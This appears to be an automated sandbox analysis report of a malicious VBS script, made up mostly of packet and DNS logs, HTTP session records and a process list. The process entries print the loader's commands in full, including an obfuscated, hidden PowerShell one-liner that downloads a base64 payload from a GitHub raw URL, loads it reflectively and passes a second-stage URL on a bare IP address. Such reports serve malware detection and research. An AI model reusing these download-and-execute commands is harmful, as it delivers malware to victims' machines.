                        Oct 2, 2024 05:28:24.149133921 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.149435997 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.149454117 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.149497986 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.149509907 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.149533987 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.149550915 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.150826931 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.150895119 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.150897980 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.150918961 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.150947094 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.150969028 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.151542902 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.151561975 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.151612997 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.151640892 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.151690960 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.152543068 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.152563095 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.152611971 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.152625084 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.152667999 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.152965069 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.152987957 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.153044939 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.153053045 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.153091908 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.212801933 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.212835073 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.212948084 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.212986946 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.213033915 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.237430096 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.237454891 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.237577915 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.237601042 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.237694025 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.237842083 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.237858057 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.237926960 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.237941027 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.238002062 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.238234997 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.238250017 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.238313913 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.238327980 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.238384962 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.239732981 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.239748955 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.239813089 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.239826918 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.239881992 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.240353107 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.240369081 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.240431070 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.240443945 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.240506887 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.241307020 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.241323948 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.241388083 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.241400957 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.241453886 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.241739988 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.241755962 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.241823912 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.241837025 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.241897106 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.301551104 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.301582098 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.301757097 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.301785946 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.301896095 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.330398083 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.330463886 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.330579042 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.330607891 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.330640078 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.330678940 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.330781937 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.330830097 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.330887079 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.330900908 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.330934048 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.330965042 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.331072092 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.331123114 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.331157923 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.331171036 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.331226110 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.331226110 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.331497908 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.331540108 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.331590891 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.331604958 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.331646919 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.331669092 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.332026958 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.332075119 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.332113028 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.332125902 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.332165003 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.332185984 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.332473993 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.332519054 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.332562923 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.332576036 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.332623959 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.332644939 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.332859993 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.332906008 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.332946062 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.332958937 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.332986116 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.333023071 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.390573025 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.390604019 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.390718937 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.390741110 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.390819073 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.419213057 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.419260979 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.419310093 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.419322968 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.419357061 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.419377089 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.419732094 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.419774055 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.419806957 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.419815063 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.419836044 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.419848919 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.420167923 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.420209885 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.420269012 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.420275927 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.420325041 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.420345068 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.420371056 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.420413017 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.420442104 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.420449972 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.420483112 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.420507908 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.420881033 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.420934916 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.420948029 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.420965910 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.421001911 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.421021938 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.421346903 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.421389103 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.421416998 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.421425104 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.421457052 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.421484947 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.421789885 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.421833038 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.421861887 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.421869993 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.421900988 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.421922922 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.479283094 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.479310036 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.479440928 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.479461908 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.479537010 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.508785009 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.508811951 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.508919001 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.508928061 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.508974075 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.509474039 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.509495020 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.509547949 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.509555101 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.509603024 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.510009050 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.510027885 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.510085106 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.510098934 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.510140896 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.510684967 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.510704041 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.510756969 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.510765076 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.510802031 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.511229992 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.511255980 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.511295080 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.511301994 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.511332989 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.511357069 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.511430979 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.511492968 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.511499882 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.511517048 CEST44349704185.199.108.133192.168.2.7
                        Oct 2, 2024 05:28:24.511544943 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.511574030 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.513885975 CEST49704443192.168.2.7185.199.108.133
                        Oct 2, 2024 05:28:24.594819069 CEST4970580192.168.2.7198.46.129.134
                        Oct 2, 2024 05:28:24.599689007 CEST8049705198.46.129.134192.168.2.7
                        Oct 2, 2024 05:28:24.599771023 CEST4970580192.168.2.7198.46.129.134
                        Oct 2, 2024 05:28:24.599869013 CEST4970580192.168.2.7198.46.129.134
                        Oct 2, 2024 05:28:24.604593992 CEST8049705198.46.129.134192.168.2.7
                        Oct 2, 2024 05:28:25.081037998 CEST8049705198.46.129.134192.168.2.7
                        Oct 2, 2024 05:28:25.132175922 CEST4970580192.168.2.7198.46.129.134
                        Oct 2, 2024 05:28:25.270235062 CEST4970580192.168.2.7198.46.129.134
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 2, 2024 05:28:21.751262903 CEST | 51389 | 53 | 192.168.2.7 | 1.1.1.1
Oct 2, 2024 05:28:21.758261919 CEST | 53 | 51389 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 2, 2024 05:28:21.751262903 CEST | 192.168.2.7 | 1.1.1.1 | 0xafb5 | Standard query (0) | raw.githubusercontent.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 2, 2024 05:28:21.758261919 CEST | 1.1.1.1 | 192.168.2.7 | 0xafb5 | No error (0) | raw.githubusercontent.com | | 185.199.108.133 | A (IP address) | IN (0x0001) | false
Oct 2, 2024 05:28:21.758261919 CEST | 1.1.1.1 | 192.168.2.7 | 0xafb5 | No error (0) | raw.githubusercontent.com | | 185.199.111.133 | A (IP address) | IN (0x0001) | false
Oct 2, 2024 05:28:21.758261919 CEST | 1.1.1.1 | 192.168.2.7 | 0xafb5 | No error (0) | raw.githubusercontent.com | | 185.199.109.133 | A (IP address) | IN (0x0001) | false
Oct 2, 2024 05:28:21.758261919 CEST | 1.1.1.1 | 192.168.2.7 | 0xafb5 | No error (0) | raw.githubusercontent.com | | 185.199.110.133 | A (IP address) | IN (0x0001) | false
                        • raw.githubusercontent.com
                        • 198.46.129.134
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49705 | 198.46.129.134 | 80 | 7304 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Oct 2, 2024 05:28:24.599869013 CEST | 77 | OUT | GET /450/LDBRR.txt HTTP/1.1
Host: 198.46.129.134
Connection: Keep-Alive
Oct 2, 2024 05:28:25.081037998 CEST | 541 | IN | HTTP/1.1 404 Not Found
                        Date: Wed, 02 Oct 2024 03:28:25 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                        Content-Length: 300
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=iso-8859-1
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 30 2e 33 30 20 53 65 72 76 65 72 20 61 74 20 31 39 38 2e 34 36 2e 31 32 39 2e 31 33 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Server at 198.46.129.134 Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49704 | 185.199.108.133 | 443 | 7304 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-02 03:28:22 UTC | 128 | OUT | GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1
                        Host: raw.githubusercontent.com
                        Connection: Keep-Alive
2024-10-02 03:28:22 UTC | 903 | IN | HTTP/1.1 200 OK
                        Connection: close
                        Content-Length: 2935468
                        Cache-Control: max-age=300
                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                        Content-Type: text/plain; charset=utf-8
                        ETag: "df9ff7aedbae4b4f50e2ae3a8f13fd0b84c66fbd35e7ac0df91a7a47b720c032"
                        Strict-Transport-Security: max-age=31536000
                        X-Content-Type-Options: nosniff
                        X-Frame-Options: deny
                        X-XSS-Protection: 1; mode=block
                        X-GitHub-Request-Id: 9D15:3A4BF6:1706DDC:18C7EAB:66FCBC5F
                        Accept-Ranges: bytes
                        Date: Wed, 02 Oct 2024 03:28:22 GMT
                        Via: 1.1 varnish
                        X-Served-By: cache-ewr-kewr1740069-EWR
                        X-Cache: HIT
                        X-Cache-Hits: 0
                        X-Timer: S1727839702.322234,VS0,VE9
                        Vary: Authorization,Accept-Encoding,Origin
                        Access-Control-Allow-Origin: *
                        Cross-Origin-Resource-Policy: cross-origin
                        X-Fastly-Request-ID: cddefadc67cd839126463674947c571351045038
                        Expires: Wed, 02 Oct 2024 03:33:22 GMT
                        Source-Age: 0


                        Target ID:2
                        Start time:23:28:18
                        Start date:01/10/2024
                        Path:C:\Windows\System32\wscript.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\uLfuBVyZFV.vbs"
                        Imagebase:0x7ff7e0f60000
                        File size:170'496 bytes
                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:4
                        Start time:23:28:18
                        Start date:01/10/2024
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                        Imagebase:0x7ff741d30000
                        File size:452'608 bytes
                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:5
                        Start time:23:28:18
                        Start date:01/10/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff75da10000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:6
                        Start time:23:28:20
                        Start date:01/10/2024
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $EnV:cOMSPeC[4,15,25]-jOiN'')( (('sBOurl '+'= U'+'NIh'+'ttps:'+'//raw.'+'github'+'use'+'rcont'+'ent.'+'com'+'/'+'N'+'oDet'+'ectOn/NoDet'+'ectO'+'n/'+'re'+'fs/head'+'s/main/Detah'+'No'+'th-V.'+'t'+'xtU'+'NI; sB'+'Oba'+'s'+'e6'+'4C'+'ontent = (Ne'+'w-Objec'+'t '+'S'+'yst'+'e'+'m'+'.Net.W'+'ebClient).Dow'+'nloadStr'+'ing'+'('+'sBOurl'+'); sB'+'Obinar'+'y'+'Content '+'= [S'+'y'+'ste'+'m.Co'+'n'+'v'+'ert'+']::FromB'+'a'+'s'+'e64S'+'tring'+'(sBO'+'base64C'+'o'+'ntent);'+' s'+'BOas'+'sem'+'bly = [Reflection.'+'Assem'+'b'+'l'+'y]::'+'Loa'+'d('+'sBObinaryConten'+'t); ['+'dnli'+'b.IO.'+'Home]'+'::VAI'+'('+'hPItxt.RR'+'BD'+'L/054/43'+'1.'+'9'+'2'+'1.64.'+'89'+'1//'+':ptthhPI, '+'hPIdesativ'+'a'+'dohPI, '+'hP'+'Id'+'e'+'s'+'at'+'ivado'+'hPI, h'+'PI'+'desativa'+'do'+'h'+'PI, '+'hP'+'Iasp'+'net_regbrows'+'e'+'rshPI,'+' hPI'+'h'+'PI,'+'hPIh'+'P'+'I)')-CRePlAcE 'UNI',[ChaR]39 -rePLAce 'hPI',[ChaR]34 -rePLAce ([ChaR]115+[ChaR]66+[ChaR]79),[ChaR]36))"
                        Imagebase:0x7ff741d30000
                        File size:452'608 bytes
                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true
